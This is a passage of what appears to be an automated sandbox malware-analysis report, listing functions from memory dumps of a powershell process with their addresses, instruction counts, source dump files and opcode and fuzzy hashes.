                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10F0B4705053009FD3219B78D4A9396BFF4FB01310F5588AAD14EC7242DB396C81CB50
                                                                                                                                                                                                                          Function 04B67968 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 05ae0d58848df2b8617f688720a2b785f69469f91b757b17d19a746472952dc4
                                                                                                                                                                                                                          • Instruction ID: 5bdeeea9431c50b82dafd169023e59c2df77b8eb44727e85d4468d7042efac46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05ae0d58848df2b8617f688720a2b785f69469f91b757b17d19a746472952dc4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79F0A7317007149FD7349A6DE844A7F77E9EBC8675B00052DE50AC3740DF34AC0187A0
                                                                                                                                                                                                                          Function 049FD998 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c0c284c931b3747dea58f9a7a53ba6fa09e75c492ddcd48ce62e47797546102a
                                                                                                                                                                                                                          • Instruction ID: fbdf2bbbc1a3d6085f5382be8c671ba89487d36041a65a0836181183f9d5a7b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0c284c931b3747dea58f9a7a53ba6fa09e75c492ddcd48ce62e47797546102a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F0F976100A40AFD725CF06CD85D23BBB9EF85620B198599E85A4B712C671FC42CFA0
                                                                                                                                                                                                                          Function 04B67697 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 68c09e5a1c83c83ba629cda8991575e31960df4b73fd7bd6090098d84721a141
                                                                                                                                                                                                                          • Instruction ID: 336f4c45b88bbf53308ca69c45c295aa0004ee13cdfd66d2cd7aaefb672f878d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68c09e5a1c83c83ba629cda8991575e31960df4b73fd7bd6090098d84721a141
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF065397005188FDB10DB7DDC40A9ABBE2EFCC65571541A9EA0ACB314DF38EC058B91
                                                                                                                                                                                                                          Function 04B690F0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 90ac516283a28e58767b378c1154ef4a59c6386a44aaf94ac205d1c6abd74a27
                                                                                                                                                                                                                          • Instruction ID: b80b321ff6f5f875a4a3698eec8ee9ebca721b12a7a22dd37757a7215a38cee0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90ac516283a28e58767b378c1154ef4a59c6386a44aaf94ac205d1c6abd74a27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8F027316001049BE314AF69D01839FBBA6DBC171CF10816ACA0A47385CE3A7842CBE0
                                                                                                                                                                                                                          Function 04B69549 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7d94f22a28956ab9a8cb32a2985cd65a6add4c1d1f0f457ba3cda7194ee4f86b
                                                                                                                                                                                                                          • Instruction ID: d3bf4cb6582c65be70be16ae5b5abe56367034b69f43215267fb91770b53edf3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d94f22a28956ab9a8cb32a2985cd65a6add4c1d1f0f457ba3cda7194ee4f86b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83E0D8623163115F971476B9885037A768FCBC7660B0612F7C513C7291DD18EC4A83F2
                                                                                                                                                                                                                          Function 04B6DE50 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ec2139265ed3a5af1770f6b2bb492120c5e00dcb328238025aa2d43390e836a8
                                                                                                                                                                                                                          • Instruction ID: ea147efcf3cd5ee55a96153cb9ef029155737e0f9a84841293af1c012335e7e6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec2139265ed3a5af1770f6b2bb492120c5e00dcb328238025aa2d43390e836a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4E0E5393002108F87149F1DD498D6AB7EAEFDEA6531904A9E94ACB321DA61EC02CB90
                                                                                                                                                                                                                          Function 04B6AF98 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c06e27420a02171e4c31df941ad9bd18495ce1ddbbabcdf77781b4609f5120e1
                                                                                                                                                                                                                          • Instruction ID: e91361a791c4f1125c513577b8774cd6e994943c26ffb83d6b70de4de8871fc5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c06e27420a02171e4c31df941ad9bd18495ce1ddbbabcdf77781b4609f5120e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E092253093915B8B16A22DA8604627B77DBD722070944FFE046CB252DD15A802C765
                                                                                                                                                                                                                          Function 04B68973 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 502cb15cdf7995d2191997121357841ae6e70fa73a9b8d1f9c3e2823325a41d8
                                                                                                                                                                                                                          • Instruction ID: 2e7ad1ef3d05853571c43d5d8aefc81473d8751634285d41bce4287da7f4ad8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 502cb15cdf7995d2191997121357841ae6e70fa73a9b8d1f9c3e2823325a41d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5E0D83170461057DB197775D41C6AEFA6AEBC4725F05516EEB0783341CF396802C3D5
                                                                                                                                                                                                                          Function 04B616E7 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 73be35a31dae3bcb689988913f1868fb0c784163e678c584d7eb6acdd429369a
                                                                                                                                                                                                                          • Instruction ID: f9efd21eb05e9595ea4c7bad036f68016536db663ca264d88aeab8916e073401
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73be35a31dae3bcb689988913f1868fb0c784163e678c584d7eb6acdd429369a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13E086667042584FDB10A6A86C186EF7BE6EBC9261F0440BADA4AC3291DF1C5C0583E1
                                                                                                                                                                                                                          Function 04B69170 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 117a0b2f22885bca30e8d9fda74b95e9978cdf1c6eb9405225fefa8caa098fef
                                                                                                                                                                                                                          • Instruction ID: 683b24f7c219739ec2427d06f9fc7af4daf1c15a72570c1d85fb1a8c8638304f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 117a0b2f22885bca30e8d9fda74b95e9978cdf1c6eb9405225fefa8caa098fef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F0ED709007049BD764DFB9D89C79ABBE5EB44324F10446DD65EC7340DB396880CB90
                                                                                                                                                                                                                          Function 04B68978 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9fae3cb97359c1f8f83f67fc12d35b363785008083263e71ad7fd253b8b3395c
                                                                                                                                                                                                                          • Instruction ID: 85f0b02303dc6bff3d13ca831c2f0aa805ba1530463d2584ffb0252c72d52d0b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fae3cb97359c1f8f83f67fc12d35b363785008083263e71ad7fd253b8b3395c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68E02631304A1057CB187775A82C6AEBA5AEBC8728F01006EDB0783381CF38280283D9
                                                                                                                                                                                                                          Function 04B69558 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 50b892f27e081fc1900caa3079ab568b4367b291f26743a650f8935ba78485fa
                                                                                                                                                                                                                          • Instruction ID: 827b942912552637d90f58de041055600496b0c5cc2787da3b3398c6b06f0218
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50b892f27e081fc1900caa3079ab568b4367b291f26743a650f8935ba78485fa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33D05E527022250B5A6434AA58006BFA5CFCAC64A570610B6DA07D7241EC58EC1A03F2
                                                                                                                                                                                                                          Function 04B6DCA0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ba71e2c65ed3fbfd454359874141c6563d25da9c0bb013384d98e65527d0593f
                                                                                                                                                                                                                          • Instruction ID: f417c02db689a8ce31bd70648f9a3d5e687b4f8fa10c29fdf6d1c34f9a58d942
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba71e2c65ed3fbfd454359874141c6563d25da9c0bb013384d98e65527d0593f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5E08C32700B14478326662EA80085E769EEFC99B5315406EE81AC7300DE68EC024BEA
                                                                                                                                                                                                                          Function 04B6DCF0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction ID: 330f3eae67b08680b3a290de0975381971601982562fe17043e5053112ce8583
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E08631B00014978B089599D4504E9F7A9DBCC220F04887ED90AA7340EA32691686E1
                                                                                                                                                                                                                          Function 04B68739 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6e3898340946de835c4bc365ffcc22e1076fcac4241bc505e8214be1a1f22c35
                                                                                                                                                                                                                          • Instruction ID: 7b716c30f73189ad5d56190fbe638093fd8240ad169a2c7d06de72c676098823
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3898340946de835c4bc365ffcc22e1076fcac4241bc505e8214be1a1f22c35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E01231805209DFC709FFB4D46A4B9BB34FB11301F4101FDD51387251EA311A46CB90
                                                                                                                                                                                                                          Function 04B68800 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b74b5ea80e0dee61b1fca14147485a4beab85c726bb1340c7a6abd69aadb77b9
                                                                                                                                                                                                                          • Instruction ID: 6ecb75b34c98dd5cb65ea2920f631b8e6605579a6375d48a50c661cec8ff0613
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b74b5ea80e0dee61b1fca14147485a4beab85c726bb1340c7a6abd69aadb77b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE09A34A0830A9BC704EFA8D056469FFB0FB46304F0245A9DE8A87341E6309C41CB80
                                                                                                                                                                                                                          Function 04B6F860 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ccd898aeb87d60cb8ba329781a4a980347ad9b6d49cc44903ed7f564b6a87b8c
                                                                                                                                                                                                                          • Instruction ID: 0b92532ebbc6d91e66a9660cd759d12351782486bf15c12a142642e24a37b7ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccd898aeb87d60cb8ba329781a4a980347ad9b6d49cc44903ed7f564b6a87b8c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BE01A70E082469FCB80DFAC94815A9FFF0EB59200B2481EED919EA205E2324612CB81
                                                                                                                                                                                                                          Function 04B6F870 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                          • Instruction ID: 86a68231802f548c39d31db65ce9f4fcaa3431c5667e72413c8e35290266029e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D067B0E04209DF8780EFADD94156EFBF4EB48200F6085AA891DE7301F7329A12DBD1
                                                                                                                                                                                                                          Function 04B68748 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: be01f2936f57dbc65e5b934ff463f44ac3846e5a8d54b33ebf80feee1c957365
                                                                                                                                                                                                                          • Instruction ID: 4edb217ce4126973728bfbe3219465ce59805d2ea08f7851b64effa099227ff8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be01f2936f57dbc65e5b934ff463f44ac3846e5a8d54b33ebf80feee1c957365
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D017308061098BCB18ABA4E82B4BDBB34FA00301F4111ADD91752291EE322A4ACAC0
                                                                                                                                                                                                                          Function 04B68810 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 21bc43c4d58c3a16a21c9e854e686765b9716a5ac2bd7fedaa2577a36289b5b0
                                                                                                                                                                                                                          • Instruction ID: a648413165010ac0b1f6815e4f6c8f13d3f5a5988f96616ddfddc9efa4dac09d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bc43c4d58c3a16a21c9e854e686765b9716a5ac2bd7fedaa2577a36289b5b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19D01234A0430A8B8714EF64D45686EBFB4E744304F0041A9DE4693344EA305801CBC1
                                                                                                                                                                                                                          Function 04B67EA0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c988f3a2bb385adab1474bd5f27fd941e289f2657a41d6ec8f31c38a3e9f01ce
                                                                                                                                                                                                                          • Instruction ID: 0119501aebd63739453361b0f14dc289b441198d23ea7dd58a2ab9b264f85e01
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c988f3a2bb385adab1474bd5f27fd941e289f2657a41d6ec8f31c38a3e9f01ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC08C104283808EEF038B304C220017F309F432003471AC2E800DB1B2D9288C01C72A
                                                                                                                                                                                                                          Function 04B67938 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3b90434c49796b4ec28e0a6b6e30b31b0ecfeb9206e69ea43f201425096cd47c
                                                                                                                                                                                                                          • Instruction ID: f1f609735611311561bd89a668cfbc8e0df6f8f01ee7f487b8e2e34d5a46ce10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b90434c49796b4ec28e0a6b6e30b31b0ecfeb9206e69ea43f201425096cd47c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74C01234005240CBCA254FB4A0444203F31EF8122A32208EAE81A0FAA3DA3A988ACB08
                                                                                                                                                                                                                          Function 04B67940 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7ac153a948efc777a12d10f12e91eb61f68b4fef70a3a3d4e3773a9d2870ab1b
                                                                                                                                                                                                                          • Instruction ID: 55ed5f906cc434ed256fc1fc87fa4182179cf45098791d675e51e7a55f24860a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ac153a948efc777a12d10f12e91eb61f68b4fef70a3a3d4e3773a9d2870ab1b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9B09230048708CFC2686FB9A4048247B29BB4022638004A9ED1E4AA939E3BE886CA48

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 04B64C62 Relevance: 6.3, Strings: 5, Instructions: 78COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Kn^$Kn^$Kn^$Kn^$Kn^
                                                                                                                                                                                                                          • API String ID: 0-2587265418
                                                                                                                                                                                                                          • Opcode ID: 7ff452a8ab99bf9b9d4cedabcdef66319dbad21e54342b89c9b3eda1f19a9704
                                                                                                                                                                                                                          • Instruction ID: d3e10c188e5a6996de110e305ae9504fa4b4e5d16f3aa5ee783511089e2d0254
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ff452a8ab99bf9b9d4cedabcdef66319dbad21e54342b89c9b3eda1f19a9704
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A231F42650E3C14FD35A873998A82927F74BF63188B1E41EBC0C88F1A3D919555B879B
                                                                                                                                                                                                                          Function 04B64D62 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Kn^$Kn^$Kn^$Kn^
